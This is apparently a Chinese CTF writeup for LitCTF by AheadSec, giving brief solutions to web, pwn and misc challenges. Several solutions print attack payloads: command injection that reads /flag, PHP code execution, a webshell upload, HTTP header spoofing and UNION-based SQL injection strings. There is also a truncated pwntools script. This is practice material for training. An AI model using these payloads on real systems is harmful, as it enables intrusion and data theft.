LitCTF Writeup By AheadSec
文章目录
- Web
- 我Flag呢?
- Follow me and hack me
- Ping
- 导弹迷踪
- PHP是世界上最好的语言!!
- 作业管理系统
- Vim yyds
- 这是什么?SQL !注一下 !
- 就当无事发生
- Flag点击就送!
- Http pro max plus
- 1zjs
- 彩蛋
- Pwn
- 只需要nc一下~
- 口算题卡
- 狠狠的溢出涅~
- ezlogin
- Misc
- 签到!
- What_1s_BASE
- take me hand
- 喜欢我的压缩包么
- 404notfound
- 这羽毛球怎么只有一半啊
- 破损的图片
- OSINT 探姬去哪了?_1
- OSINT 探姬去哪了?_2
- OSINT 探姬去哪了?_0
- OSINT 探姬去哪了?_3
- OSINT 这是什么地方?!
- OSINT 小麦果汁
- Mincemeat
- 两仪生四象
- ssvvgg
- 雪山的秘密
- easy_shark
Web
我Flag呢?
直接查看源码,在最底下注释里面找到flag
Follow me and hack me
使用get和post分别传值,得到flag
GET:?CTF=Lit2023POST:Challenge=i'm_c0m1ng
Ping
command=127.0.0.1;cat /flag&ping=Ping
导弹迷踪
查看网页源码,打开game.js文件
在game.js中找到flag,加上NSSCTF标志
PHP是世界上最好的语言!!
在输入栏中直接输入system(‘cat /flag’);即可得到flag,存在命令执行
作业管理系统
打开环境,在源码中找到 账号密码 均为admin
上传文件一句话木马 然后用蚁剑连接
Vim yyds
vim异常退出会留下swp文件,访问.index.php.swp会得到源码
放到linux上直接可以看
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag
这是什么?SQL !注一下 !
嵌套了多层括号,过滤了+和#(没测试完整),其他没什么要注意的
flag不在当前库,在ctftraining库中,最后的payload如下:
?id=0)))))) union select 1,concat(flag) from ctftraining.flag limit 0,1 -- 1
就当无事发生
一道简单的github泄露题
LitCTF{g1thub_c0mmit_1s_s0_us3ful}
Flag点击就送!
考的应该是Flask session伪造
Http pro max plus
Client-IP:127.0.0.1
Referer:pornhub.com
User-Agent:Chrome
Via:Clash.win
访问:/wtfwtfwtfwtf.php 接着访问/sejishikong.php
1zjs
js有提示
/f@k3flag.php
jsfuck
彩蛋
第一段flag在我Flag呢?的script.min.js文件中
第二段在Follow me and hack me的www.zip备份文件中
第三段在作业管理系统
第四段在这是什么?SQL !注一下 !
/?id=0)))))) union select 1,concat(password) from ctf.users limit 1,2 -- 1
NSSCTF{First_t0_The_k3y!_S0_ne3t?_R3ady_Pl4yer_000ne_F1rst_to_Th3_eggggggggg!}
Pwn
只需要nc一下~
从Dockerfile文件获取变量FLAG
口算题卡
from pwn import *io = remote('node4.anna.nssctf.cn',28253)
#context(arch='amd64',os='linux',log_level='debug',terminal=['tmux','splitw','-h'])#根据输出跑100次
for i in range(100):io.recvuntil(b"What is ")#接收符号前字符a = int(io.recvuntil(b" ")[:-1])#接收符号字符z = str(io.recvuntil(b" ")[:-1])[2:-1]#接收符号后字符b = int(io.recvuntil(b"?\n")[:-2])#判断符号,根据符号进行运算t = 0if z == '+':t = a+bif z == '-':t = a-bif z == '*':t = a*bif z == '/':t = a/b#将运算的值发送io.sendline(b"%d"%(t))#跑完后获取flag
io.recvuntil(b"flag:")
flag = str(io.recvuntil(b"\n")[:-1])[2:-1]print('[
LitCTF Writeup By AheadSec相关推荐
- 2021年中国工业互联网安全大赛核能行业赛道writeup之usb流量分析
目录 一.USB协议 二.键盘流量 三.鼠标流量 四.writeup 附件题:usb流量分析 题目描述: 具体描述忘记了o(╯□╰)o 大概意思是有个U盘插到电脑上,然后经过一些操作导致该电脑重启了. ...
- 2021年中国工业互联网安全大赛核能行业赛道writeup之鱿鱼游戏
目录 一.尝试 二.Writeup 附加题 鱿鱼游戏(来自最近一部很火的韩剧) 题目描述: 小王由于操作不规范,误将不明U盘插入到上位机中,导致上位机中的某些关键文件被加密,但攻击者在U盘中还留下了一 ...
- 2018湖湘杯海选复赛Writeup
2018湖湘杯Writeup 0x01 签到题 0x02 MISC Flow 0x03 WEB Code Check 0x04 WEB Readflag 0x05 WEB XmeO 0x06 Reve ...
- php upload ctf,强网杯CTF防御赛ez_upload Writeup
这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家. ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型 ...
- 安恒赛php_安恒11月月赛周周练writeup
前言 11月月赛 完美错过时间,正好有周周练,基本都是一样月赛的web,记录下write up 手速要快 这题是10月月赛中的一题,直接看我上次的writeup:安恒月赛(十)web-2题writeu ...
- 南京邮电大学网络攻防训练平台(NCTF)-异性相吸-Writeup
南京邮电大学网络攻防训练平台(NCTF)-异性相吸-Writeup 题目描述 文件下载地址 很明显,文件之间进行亦或就可得到flag,不再多说,直接上脚本 1 #coding:utf-8 2 file ...
- 社团的CTF逆向题WriteUp
最近社团弄了CTF比赛,然后我就帮忙写了逆向的题目,这里写一下WriteUp,题目和源码在附件中给出 一个简单的逆向:one_jmp_to_flag.exe 这题算是签到题,直接OD智能搜索就完事了, ...
- CTF-i春秋网鼎杯第一场misc部分writeup
CTF-i春秋网鼎杯第一场misc部分writeup 最近因为工作原因报名了网鼎杯,被虐了几天后方知自己还是太年轻!分享一下自己的解题经验吧 minified 题目: 一张花屏,png的图片,老方法, ...
- NCTF2019 -- PWN部分writeup
pwn学习总结(二) -- PWN部分writeup warmup easy_rop warmup 查看程序防护: 查看反汇编: 已知条件: 开启了溢出检测 开启了沙盒模式,只能调用libc中的ope ...
最新文章
- JavaScript正则表达式快速判断技巧
- JavaSE_坚持读源码_ClassLoader对象_Java1.7
- AMPAS/ASC Common File Format LUT
- PAT甲级1067 Sort with Swap(0, i):[C++题解]此题不是很懂!!
- svn服务器搭建经验总结
- 使用animate实现页面过度_很多人都在使用的开源CSS动画效果库——animate.css
- 【php内核与扩展开发系列】PHP生命周期---启动、终止与模式
- 拼接大屏数据展示_可视化大屏的UI设计是根据哪几个方面来进行?
- 库存处理(第一次做库存,希望让需要者帮助得到帮助,让有经验者提出指导)...
- C# 打开指定文件夹下的excel
- android安卓 通知notification
- 数列极限的性质与判定
- 申城「三日谈」:言汇百家,思通以达(SDCC 2017上海站PPT集锦)
- DDD中的值对象和实体
- H2数据库入门,看这篇就对了
- Linux搭建FTP服务使用案例
- 腾讯轻量+宝塔搭建文档在线预览项目kkFileView
- 根据日期获取某一时间段内的数据
- 数据是如何在内存中存储的?
- QT中使用fontawesome-webfont.ttf字体库
热门文章